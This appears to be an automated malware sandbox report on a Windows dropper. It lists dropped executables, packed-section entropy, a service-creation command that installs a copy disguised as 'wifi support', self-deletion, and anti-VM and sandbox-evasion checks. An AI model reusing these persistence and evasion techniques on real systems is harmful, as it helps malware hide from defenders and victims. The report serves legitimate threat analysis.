                      Source: 27.0.B217.exe.a90000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 42.0.B217.exe.1b0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 42.0.B217.exe.1b0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 42.0.B217.exe.1b0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Code function: 1_2_004092EC push esp; ret
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Code function: 1_2_00573634 push es; iretd
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Code function: 3_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Code function: 3_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe | Code function: 3_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\rcvfbte | Code function: 15_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\rcvfbte | Code function: 15_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe | Code function: 16_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe | Code function: 16_2_0047127E push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe | Code function: 16_2_0047123C push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe | Code function: 16_2_0047735E push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe | Code function: 16_2_004753C8 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 17_2_006C3634 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\A019.exe | Code function: 20_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_0041A66D push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_0088D603 pushfd ; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00888A20 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00888988 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_008889B4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_0088D5D1 pushfd ; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_008889F4 push ebx; retf
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00889F1B push ebx; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00888978 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_0088CB70 pushad ; ret
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe | Code function: 26_2_0043DF53 push esi; retn 0042h
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe | Code function: 27_2_00A98508 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe | Code function: 27_2_00A9764A push esp; ret
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_05284003 push esi; retf
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042D560 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: 3657.exe.10.drStatic PE information: 0x964C769C [Sat Nov 27 02:38:20 2049 UTC]
                      Source: ZA3cYU28Yl.exeStatic PE information: section name: .wumened
                      Source: ZA3cYU28Yl.exeStatic PE information: section name: .kilohe
                      Source: ZA3cYU28Yl.exeStatic PE information: section name: .putohox
                      Source: 2EE4.exe.10.drStatic PE information: section name: _RDATA
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name: .28gybOo
                      Source: 41A3.exe.10.drStatic PE information: section name: .adata
                      Source: A019.exe.10.drStatic PE information: section name: .wumened
                      Source: A019.exe.10.drStatic PE information: section name: .kilohe
                      Source: A019.exe.10.drStatic PE information: section name: .putohox
                      Source: 9779.exe.10.drStatic PE information: section name: .zic
                      Source: 9779.exe.10.drStatic PE information: section name: .wuvuhus
                      Source: 9779.exe.10.drStatic PE information: section name: .jufot
                      Source: A881.exe.10.drStatic PE information: section name: .mekafe
                      Source: A881.exe.10.drStatic PE information: section name: .tuxu
                      Source: A881.exe.10.drStatic PE information: section name: .hawoz
                      Source: 50E7.exe.10.drStatic PE information: section name: .didata
                      Source: 72B9.exe.10.drStatic PE information: section name: _RDATA
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name: .2pZFPAB
                      Source: 7F9A.exe.10.drStatic PE information: section name: .adata
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name: .kujN2o2
                      Source: 8ECE.exe.10.drStatic PE information: section name: .adata
                      Source: rcvfbte.10.drStatic PE information: section name: .wumened
                      Source: rcvfbte.10.drStatic PE information: section name: .kilohe
                      Source: rcvfbte.10.drStatic PE information: section name: .putohox
                      Source: lnagngtg.exe.26.drStatic PE information: section name: .mekafe
                      Source: lnagngtg.exe.26.drStatic PE information: section name: .tuxu
                      Source: lnagngtg.exe.26.drStatic PE information: section name: .hawoz
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                      Source: 3657.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x1298c
                      Source: 41A3.exe.10.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                      Source: B217.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                      Source: 8ECE.exe.10.drStatic PE information: real checksum: 0x373823 should be: 0x3738f9
                      Source: 7F9A.exe.10.drStatic PE information: real checksum: 0x36d1e8 should be: 0x37985e
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.95926809019
                      Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                      Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                      Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                      Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                      Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.95926809019
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.98113997622
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96210301798
                      Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715965774
                      Source: initial sampleStatic PE information: section name: entropy: 7.90405352991
                      Source: initial sampleStatic PE information: section name: entropy: 7.99357874577
                      Source: initial sampleStatic PE information: section name: entropy: 7.7922746648
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.23071246858
                      Source: initial sampleStatic PE information: section name: .2pZFPAB entropy: 7.9174117718
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715248044
                      Source: initial sampleStatic PE information: section name: entropy: 7.90789134233
                      Source: initial sampleStatic PE information: section name: entropy: 7.99431797903
                      Source: initial sampleStatic PE information: section name: entropy: 7.81839424264
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22755578232
                      Source: initial sampleStatic PE information: section name: .kujN2o2 entropy: 7.91856580958
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.95926809019
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96210301798
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: B217.exe.10.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.0.B217.exe.a90000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.0.B217.exe.a90000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.2.B217.exe.a90000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.0.B217.exe.a90000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.B217.exe.1b0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 42.0.B217.exe.1b0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.B217.exe.1b0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 42.0.B217.exe.1b0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.B217.exe.1b0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.B217.exe.1b0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rcvfbteJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3657.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\50E7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8ECE.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A019.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rcvfbteJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7F9A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9460.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2EE4.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B217.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\72B9.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9779.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\969F.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeFile created: C:\Users\user\AppData\Local\Temp\lnagngtg.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A881.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\293.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\48E7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\41A3.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\za3cyu28yl.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\rcvfbte:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\WerFault.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX (4 times)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (2 times)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (20 times)
Source: C:\Users\user\AppData\Local\Temp\A881.exe | Process information set: NOGPFAULTERRORBOX (4 times)
Source: C:\Users\user\AppData\Local\Temp\A881.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A881.exe | Process information set: NOGPFAULTERRORBOX (4 times)
Source: C:\Users\user\AppData\Local\Temp\B217.exe | Process information set: NOOPENFILEERRORBOX (23 times)

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after checking mutex)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: A019.exe, 00000014.00000002.407579269.00000000020B0000.00000004.00000001.sdmpBinary or memory string: ASWHOOK
                      Found evasive API chain (may stop execution after checking locale)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00406AA0
                      Found evasive API chain (may stop execution after checking computer name)
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Evasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\explorer.exe TID: 5528 Thread sleep count: 577 > 30
                      Source: C:\Windows\explorer.exe TID: 5848 Thread sleep count: 223 > 30
                      Source: C:\Windows\explorer.exe TID: 2464 Thread sleep count: 271 > 30
                      Source: C:\Windows\explorer.exe TID: 6888 Thread sleep count: 403 > 30
                      Source: C:\Windows\explorer.exe TID: 4784 Thread sleep count: 167 > 30
                      Source: C:\Windows\explorer.exe TID: 4700 Thread sleep count: 168 > 30
                      Source: C:\Windows\explorer.exe TID: 5776 Thread sleep count: 310 > 30
                      Source: C:\Windows\explorer.exe TID: 4620 Thread sleep count: 148 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6848 Thread sleep time: -210000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe TID: 3220 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 577
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 403
                      Source: C:\Users\user\AppData\Local\Temp\9460.exe API coverage: 8.1 %
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe API coverage: 6.4 %
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Code function: 22_2_00406AA0
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3657.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\50E7.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8ECE.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe (copy)
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7F9A.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2EE4.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\72B9.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\969F.exe
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lnagngtg.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\293.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\48E7.exe
                      Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\41A3.exe
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe Evaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\A881.exe Evaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exe API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\9779.exe API call chain: ExitProcess graph end node
                      Source: explorer.exe, 0000000A.00000000.332068185.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
